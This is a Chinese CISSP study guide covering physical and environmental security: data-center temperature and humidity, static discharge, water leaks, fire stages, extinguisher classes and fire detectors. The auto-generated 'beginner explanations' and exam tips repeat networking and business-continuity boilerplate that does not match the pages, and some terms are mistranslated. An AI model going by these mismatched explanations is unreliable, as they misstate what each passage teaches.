这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

computers should generally be kept between 59 and 89.6 degrees Fahrenheit (15 and 32 degrees Celsius). However, some extreme environments run their equipment 20 degrees Fahrenheit lower or higher than this range. The actual temperature is not as important as keeping devices from reaching a temperature that would cause damage and optimizing temperature related to device performance and humidity management. Some devices may operate more efficiently at higher or lower temperatures.

Generally, temperature management is optimized using fans, either directly connected to heat sinks on devices, like CPUs, memory banks, or video cards, or indirectly by being part of their chassis or host storage cabinet (such as a rack-mount cabinet). Fans are used to pull warm/hot air off equipment and out of devices and allow it to be replaced by cooler air. Hot and cold aisles are a means of maintaining optimum operating temperature in large server rooms. The overall technique is to arrange server racks in lines separated by aisles (Figure 10.2).

Then, the airflow system is designed so hot, rising air is captured by air-intake vents on the ceiling, whereas cold air is returned in opposing aisles from either the ceiling or the floor. Thus, every other aisle is hot, then cold. FIGURE 10.2 Hot and cold aisles

中文直译 / 整理

计算机的房间,温度通常应保持在59至89.6华氏度(15至32摄氏度)之间。 然 而,某些极端环境会将设备温度调低或调高20华氏度,超出此范围。 实际温度 的重要性不如防止设备达到可能造成损坏的温度,以及优化与设备性能和湿度 管理相关的温度。 某些设备在较高或较低温度下可能运行得更高效。 通常,温 度管理通过风扇优化实现,这些风扇直接连接到设备的散热器上,例如CPU、 内存条或显卡,或间接通过成为其机箱或主机存储机柜的一部分(例如机架式 机柜)。 风扇用于将设备产生的热空气抽出并引入较冷的空气以进行替换。 热通道和冷通道是保持大型服务器房间最佳运行温度的一种方法。 整体技术是 将服务器机架排列成由通道隔开的行(图10.2)。 然后,气流系统被设计为将 上升的热空气通过天花板上的进气口捕获,而冷空气则从天花板或地板返回到 相反的通道中。 因此,每隔一个通道为热通道,然后是冷通道。 图10.2 热通道和冷通道

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 685 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 31 / PDF P686

第 686 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A common HVAC-related term is plenum. The plenum consists of boxes and tubes that distribute conditioned air throughout a building. Plenum spaces are the areas of a building designed to contain the HVAC plenum components. Plenum spaces are typically distinct and separate from human-inhabitable spaces within a building. Due to building codes in most countries, anything that is placed into the plenum space must be plenum-rated. This type of fire rating requires that those products produce minimal levels of smoke and/or toxic gases, especially if the building has enclosed spaces that could trap gases. Electrical cables and networking cables are common plenum-rated products.

An important aspect of temperature management is attempting to maintain a stable temperature rather than allowing the temperature to fluctuate up and down. Such heat oscillations can cause the expansion and contraction of materials. This could cause chip creep (where friction-fit connections work their way out of their sockets) or cracks in soldered connections. We also recommend that you maintain positive air pressure in the data center as well as superior levels of air filtration. These efforts will help reduce dust, debris, microfine particulate matter infiltration, and other contaminants (such as cleaning chemicals or vehicle exhaust).

Without such efforts, these unwanted particles can build up over time; dust bunnies can attach to surfaces due to static charges or may cause corrosion. Additionally, humidity (i.e., relative humidity [RH]) in a computer room should be maintained between 20 and 80 percent. However, some environments allow for RH to be as low as 8 percent and as high as 90 percent. Too much humidity can result in condensation, which causes corrosion. Too little humidity allows for static electricity buildup, which can result in electrostatic discharge (ESD).

Even with antistatic carpeting, if the environment has low humidity it is still possible to generate 20,000-volt static discharges from your human body via ESD. Table 10.1 shows that even minimal levels of static discharge can destroy electronic equipment.

中文直译 / 整理

一个常见的与暖通空调相关的术语是送风静压箱。 送风静压箱由分布调 节空气至整个建筑的箱体和管道组成。 送风静压空间是指专为容纳暖通空调 送风静压箱组件而设计的建筑区域。 送风静压空间通常与建筑内可供人员居 住的区域明确分离。 由于大多数国家的建筑规范,任何放置在送风静压空间 中的物品都必须符合送风静压等级要求。 这种防火等级要求相关产品产生的 烟雾和/或有毒气体含量极低,尤其当建筑具有可能积聚气体的封闭空间时。 电气电缆和网络电缆是常见的送风静压等级产品。 温度管理的一个重要方面是努力保持温度稳定,而不是允许温度上下波动。 这 种温度波动可能导致材料的膨胀和收缩,从而引起芯片蠕动(即摩擦配合连接 逐渐从插槽中松脱)或焊点开裂。 我们还建议您保持数据中心内的正压以及优良的空气过滤水平。 这些措施有助 于减少灰尘、碎屑、微细颗粒物以及其他污染物(如清洁化学品或车辆尾气) 的侵入。 若不采取这些措施,这些有害颗粒会随时间积累; 尘螨可能因静电附 着在表面,或导致腐蚀。 此外,计算机房的湿度(即相对湿度[RH])应保持在20%至80%之间。 然而, 某些环境允许RH低至8%,高至90%。 湿度过高会导致冷凝,从而引起腐蚀;

湿度过低则会导致静电积聚,可能引发静电放电(ESD)。 即使铺设了防静电 地毯,如果环境湿度较低,仍可能通过ESD从人体产生高达20,000伏的静电放 电。 表10.1显示,即使是最轻微的静电放电也可能破坏电子设备。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 686 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 32 / PDF P687

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

TABLE 10.1 Static voltage and damage Static voltage Possible damage 40 Destruction of sensitive circuits and other electronic components 1,000 Scrambling of monitor displays 1,500 Destruction of data stored on hard drives 2,000 Abrupt system shutdown 4,000 Printer jam or component damage 17,000 Permanent circuit damage Environmental monitoring is measuring and evaluating the quality of the environment within a given structure. This can focus on general or basic concerns, such as temperature, humidity, dust, smoke, and other debris. However, more advanced systems can include chemical, biological, radiological, and microbiological detectors.

Condition monitoring is monitoring and assessing the operational parameters, performance, and health of machinery, equipment, or systems in real-time or periodically. The primary goal of condition monitoring is to identify any deviations from normal operating conditions that could indicate potential faults, defects, or deterioration. This proactive approach helps predict and prevent equipment failures, minimize downtime, and optimize maintenance strategies. Water Issues Your environmental safety policy and procedures should address water issues, such as leakage and flooding. Plumbing leaks are not an everyday occurrence, but when they do happen, they can cause significant damage.

Water and electricity don't mix. If your computer systems come into contact with water, especially while they are operating, damage is sure to occur. Plus, water and electricity create a serious risk of electrocution for nearby personnel. Whenever possible, locate server rooms, data centers, and critical computer equipment away from any water source or transport pipes located

中文直译 / 整理

表 10.1 静电电压与损坏 静电 电压 可能的损坏 40 破坏敏感电路和其他电子元件 1,000 显示器乱码 1,500 硬盘上存储的数据被破坏 2,000 系统突然关机 4,000 打印机卡纸或部件损坏 17,000 永久性电路损坏 环境监测是测量和评估特定结构内环境质量的过程。 这可以关注一般 或基本的指标,例如温度、湿度、灰尘、烟雾和其他杂物。 然而,更先进 的系统可以包括化学、生物、放射性和微生物检测器。 状态监测 是对机械、设备或系统的运行参数、性能和健康状况进行实时或 定期的监控与评估。 状态监测的主要目标是识别任何偏离正常运行条件的情 况,这些情况可能表明存在潜在故障、缺陷或劣化。 这种主动方法有助于预 测并预防设备故障,最大限度地减少停机时间,并优化维护策略。 水问题 您的环境安全政策和程序应涵盖水问题,例如泄漏和淹水。 管道泄漏并非 日常发生,但一旦发生,可能造成重大损害。 水和电不能混合。 如果您的计算机系统接触到水,尤其是在运行时,必定会造 成损坏。 此外,水和电还会对附近人员造成严重的触电风险。 尽可能将服务器 机房、数据中心和关键计算机设备安置在远离任何水源或输送管道的地方

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 33 / PDF P688

第 688 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

in the building. You may also want to install water-detection circuits on the floor (or under the floor with raised flooring data centers) around missioncritical systems. Water-detection circuits will sound an alarm and alert you if water is encroaching upon the equipment. To minimize emergencies, be familiar with shutoff valves and drainage locations. In addition to monitoring for plumbing leaks, you should evaluate your facility's ability to handle severe rain or flooding in its vicinity. Is the facility located on a hill or in a valley? Is there sufficient drainage? Is there a history of flooding or accumulation of standing water? Is a server room in the basement or on the first floor?

Are there water features or landscaping around the building that might cause flooding or direct heavy rainfall toward and into the building? Fire Prevention, Detection, and Suppression Fire prevention, detection, and suppression must not be overlooked. Protecting personnel from harm should always be the most important goal of any security or protection system. In addition to protecting people, fire detection and suppression is designed to keep asset damage caused by fire, smoke, heat, and suppression materials to a minimum. Standard fire prevention and resolution training involves knowledge of the fire triangle (see Figure 10.3).

The three corners of the triangle represent fuel, heat, and oxygen. The center of the triangle represents the chemical reaction among these three elements. The purpose of the fire triangle is to illustrate that if you can remove any one of the four items from the fire triangle, the fire can be extinguished. Different suppression mediums address different aspects of the fire: Water suppresses the temperature. Soda acid and other dry powders suppress the fuel supply. Carbon dioxide (CO2) suppresses the oxygen supply. Halon substitutes and other nonflammable gases interfere with the chemistry of combustion and/or suppress the oxygen supply.

Aqueous film forming foam (AFFF) suppresses temperature and fuel supply.

中文直译 / 整理

在建筑物内。 您还可以在关键任务系统周围的地板上(或在采用架空地板的数 据中心的地板下方)安装漏水检测电路。 漏水检测电路会在水接近设备时发出 警报并提醒您。 为减少紧急情况的发生,请熟悉关闭阀和排水位置。 除了监测管道泄漏外,您 还应评估您的设施应对附近强降雨或洪水的能力。 设施是位于山坡上还是山谷 中? 是否有足够的排水系统? 是否有过洪水或积水的历史? 服务器机房是否位 于地下室或一楼? 建筑物周围是否有水景或景观设计可能导致洪水或将强降雨 引向并进入建筑物? 火灾预防、探测与扑灭 Fire prevention , detection , and su ppression must not be overlooked. 保护人员免受伤害应始终是任何安全或防护系统的首要目标。 除了保护人员外, 火灾探测和扑灭系统旨在将火灾、烟雾、热量和扑灭材料造成的资产损失降至 最低。 标准的防火和灭火培训包括对 火三角(见 图10.3)的知识。 三角形的三个 角分别代表燃料、热量和氧气。 三角形的中心代表这三个元素之间的化学反应。 火三角的目的是说明,如果能够从火三角中移除任意一个要素,火就可以被扑 灭。

不同的灭火介质针对火的不同方面: 水可降低温度。 碳酸酸和其他干粉可抑制燃料供应。 二氧化碳(CO2)可抑制氧气供应。 哈龙替代品和其他不可燃气体会干扰燃烧的化学过程和/或抑制氧气供应。 水成膜泡沫(AFFF)可降低温度并抑制燃料供应。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 688 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
标准 标准给出必须满足的最低要求。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 34 / PDF P689

第 689 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 10.3 The fire triangle Aqueous film forming foam (AFFF) is a type of firefighting foam used to suppress flammable liquid fires. It is a water-based solution containing foaming agents, surfactants, and typically some fluorochemicals. AFFF is designed to quickly spread across the surface of flammable liquids, forming a thin film or barrier that suppresses the release of flammable vapors and prevents the fire from spreading. When selecting a suppression medium, consider what aspect of the fire triangle it addresses, what this really represents, how effective the suppression medium usually is, and what impact the suppression medium will exert on your environment.

In addition to understanding the fire triangle, you should understand the stages of fire. Fires go through numerous stages, and Figure 10.4 addresses the four most vital stages.

中文直译 / 整理

图 10.3 燃烧三角形 水成膜泡沫(AFFF)是一种用于扑灭易燃液体火灾的灭火泡沫。 它是 一种水基溶液,含有发泡剂、表面活性剂,通常还含有一些氟化学物质。 AFFF的设计目的是迅速在易燃液体表面扩散,形成一层薄薄的膜或屏障, 抑制可燃蒸气的释放并防止火势蔓延。 选择灭火介质时,请考虑它针对燃烧三角形的哪个方面、这实际代表什么、 该灭火介质通常的有效性,以及该灭火介质对环境的影响。 除了理解火三角之外,您还应了解火灾的阶段。 火灾会经历多个阶段,图 10.4介绍了其中四个最关键的阶段。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 689 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 35 / PDF P690

第 690 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 10.4 The four primary stages of fire Stage 1: The Incipient Stage At this stage, there is only air ionization and no smoke. Stage 2: The Smoke Stage In Stage 2, smoke is visible from the point of ignition. Stage 3: The Flame Stage This is when a flame can be seen with the naked eye. Stage 4: The Heat Stage At Stage 4, the fire is considerably further down the timescale to the point where there is an intense heat buildup

中文直译 / 整理

图 10.4 火灾的四个主要阶段 第一阶段:初期阶段 在这一阶段,仅有空气电离,没有烟雾。 第二阶段:烟雾阶段 在第二阶段,可以从点火点看到烟雾。 第三阶段:火焰阶段 这时肉眼可以看到火焰。 第四阶段:高温阶段在第四阶段,火灾已进一步推进至时间轴的后期,此时 热量急剧积聚

小白解释

场景先行:你是公司的安全负责人,正在读第 690 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 690 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 36 / PDF P691

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

and everything in the area burns. The earlier a fire is detected, the easier it is to extinguish and the less damage it and its suppression medium(s) can cause. One of the basics of fire management is proper personnel awareness training. Employees need to be trained in safety and escape procedures. Everyone should be thoroughly familiar with the fire suppression mechanisms in their facility. Everyone should also be familiar with at least two evacuation routes from their primary work area and know how to locate evacuation routes elsewhere in the facility.

Typically, evacuation routes are indicated by emergency exit signs, illustrated by maps posted on walls, located in common or central areas (such as near elevators), and defined in personnel training and reference manuals. Personnel should be trained in the location and use of fire extinguishers. Organizations should also preestablish a rendezvous location or safety verification mechanism (such as voicemail) to confirm that all employees escaped a building successfully. Other items to include in fire or general emergency-response training include cardiopulmonary resuscitation (CPR), emergency shutdown procedures, general first aid, and automated external defibrillator (AED) devices.

Once employees are trained, their training should be tested using drills and simulations. All elements of physical security, especially those related to human life and safety, should be tested on a regular basis. It is mandated by law (in the United States) that fire extinguishers, fire detectors/alarms, and elevators be inspected regularly. Most fires in a data center are caused by overloaded electrical distribution outlets. A second common cause is improper use of heating devices (such as coffeepots, hot plates, and space heaters) when located near combustible materials (such as paper, cloth, and cardboard).

Fire Extinguishers If a worker notices a fire before the building detects it, then they may be able to use a handheld fire extinguisher to put out the fire. There are several types of fire extinguishers. Understanding what type to use on various forms of fire is essential to effective fire suppression. If a fire extinguisher is used

中文直译 / 整理

并且该区域内的所有物品都被烧毁。 火灾被发现得越早,就越容易扑灭,其本身及其灭火介质造成的损害也越小。 火灾管理的基本要点之一是proper personnel awareness training。 员工需 要接受安全和逃生程序的培训。 每个人都应充分熟悉本设施内的火灾扑救机制。 每个人都还应熟悉从其主要工作区域出发的至少两条疏散路线,并了解如何在 设施其他区域找到疏散路线。 通常,疏散路线通过紧急出口标志指示,或由张 贴在墙壁上的地图说明,这些地图通常位于公共或中心区域(如电梯附近), 并在人员培训和参考手册中加以定义。 人员应接受灭火器位置和使用方法的培 训。 组织还应预先设定集合地点或安全确认机制(如语音信箱),以确认所有 员工均已成功撤离建筑物。 火灾或一般应急响应培训中还应包括心肺复苏术(CPR)、紧急停机程序、基 本急救和自动体外除颤器(AED)设备。 员工培训完成后,应通过演练和模拟对其培训效果进行测试。 所有物理安全 要素,特别是与人身安全相关的要素,都应定期进行测试。 根据法律(在美 国)规定,灭火器、火灾探测器/报警器和电梯必须定期检查。 数据中心的大多数火灾是由电气配电插座过载引起的。

第二个常见原 因是不当使用加热设备(如咖啡壶、电热板和空间加热器),尤其是在其 靠近可燃物(如纸张、布料和纸板)时。 灭火器 如果工作人员在建筑检测到火灾之前发现了火情,他们可能能够使用手持式灭 火器扑灭火灾。 灭火器有多种类型。 了解针对不同类型的火灾应使用哪种灭火 器,对于有效灭火至关重要。 如果使用灭火器

小白解释

场景先行:你是公司的安全负责人,正在读第 691 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 37 / PDF P692

第 692 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

improperly or the wrong form of fire extinguisher is used, the fire could spread and intensify instead of being quenched. A fire extinguisher may be effective through the first three stages of fire, but is unlikely to be of any use at Stage 4, the heat stage. Fortunately, local fire regulations and building codes typically dictate the type of fire extinguisher to be present. For most standard office environments, a multiclass extinguisher (likely an ABC) is deployed because it is suitable for the widest range of common fire types in that type of location. Table 10.2 lists common types of fire extinguishers.

TABLE 10.2 Fire extinguisher classes ClassType Suppression material A Common combustibles Water, soda acid (a dry powder or liquid chemical) B Liquids AFFF, CO2, halon or alternate gas options, soda acid C Electrical CO2, halon or alternate gas options D Metals Dry powder K Cooking media (fats, oil) Alkaline mixtures (e.g., potassium acetate, potassium citrate, or potassium carbonate) (to cause saponification) Water and other liquids cannot be used on Class B/K fires because they would vaporize, causing an explosion and spreading the burning liquids all over the area. Water cannot be used on Class C fires because of the potential for electrocution.

Oxygen suppression cannot be used on metal fires because burning metal produces its own oxygen. Fire Detection Systems Properly protecting a facility from fire requires installing an automated detection and suppression system. There are many types of fire detection systems. Fixed-temperature detection systems trigger suppression when a specific temperature is reached. This is the most common type of detector and is present in most office buildings. The potentially visible sprinkler head

中文直译 / 整理

不当或使用了错误类型的灭火器,火势可能会蔓延并加剧,而非被扑灭。 灭火 器在火灾的前三个阶段可能有效,但在第四个阶段(高温阶段)几乎无用。 幸运的是,当地的消防法规和建筑规范通常会规定必须配备的灭火器类型。 对 于大多数标准办公环境,通常会部署多类灭火器(可能是ABC类),因为它适 用于该类场所中最常见的各种火灾类型。 表10.2列出了常见的灭火器类型。 表10.2灭火器类别 类别 灭火介质 A 常见可燃物 水、苏打酸(干粉或液体化学剂) B 液体 AFFF、CO2, 哈龙或替代气体选项、碳酸酸 C 电气 CO2, 哈龙或替代气体选项 D 金属 干粉 K 烹饪 介质(脂肪, oil) 碱性混合物(例如乙酸钾、柠檬酸钾或碳酸钾)(用于引 起 皂化) B类/K类火灾不能使用水,因为水会汽化,导致爆炸并使燃烧的液体 四处飞溅。 C类火灾不能使用水,因为有触电风险。 金属火灾不能使用氧 气抑制剂,因为燃烧的金属会自身产生氧气。 火灾探测系统 正确保护设施免受火灾需要安装自动探测和灭火系统。 火灾探测系统有多种类 型。 定温探测系统在达到特定温度时触发灭火。 这是最常见的探测器类型,存 在于大多数办公楼中。 潜在可见的喷头

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 692 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 38 / PDF P693

第 693 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

serves as both the detection and release mechanism. The trigger is usually a metal or plastic component that is in the sprinkler head and melts at a specific temperature. There is also a version with a small glass vial containing chemicals that vaporize to over-pressurize and shatter the container at a specific temperature. This system is inexpensive and reliable, even over long time periods. Rate-of-rise detection systems trigger suppression when the speed at which the temperature changes reaches a specific level. These are often digital temperature measuring devices, which can be fooled by HVAC heating during winter months and thus are not widely deployed.

Flame-actuated systems trigger suppression based on the infrared energy of flames. This mechanism is fast and reliable but often fairly expensive. Thus, it is often only used in high-risk environments. Smoke-actuated systems use photoelectric or radioactive ionization sensors as triggers. Either method monitors for light or radiation obstruction or reduction across an air gap caused by particles in the air. It is intended to be triggered by smoke, but dust and steam can sometimes trigger the alarm. The radioactive ionization-based smoke detectors use americium as a source of alpha particles and a Geiger counter to detect the rate of these particles' transmission across the air gap.

This element produces such low levels of radiation that a layer of dead skin cells is sufficient to block its transmission. Incipient smoke detection systems, also known as aspirating sensors, are able to detect the chemicals typically associated with the very early stages of combustion before a fire is otherwise detectable via other means. These devices are even more costly than flame-actuated sensors and are also only used in high-risk or critical environments. To be effective, fire detectors need to be placed strategically.

Don't forget to place them inside dropped ceilings and raised floors, in server rooms, in private offices and public areas, in HVAC vents, in elevator shafts, in the basement, and so on. Once a fire-detection device notices the presence of a fire, it typically will trigger the fire alarm. Most fire alarms are loud, piercing beeps or sirens paired with brightly flashing lights. A fire alarm is intended to be obvious, startling, and attention-grabbing. There is usually no mistaking a fire alarm or “not noticing” that it went off. Once a fire alarm occurs, all personnel should follow their safety training and begin to exit the building.

中文直译 / 整理

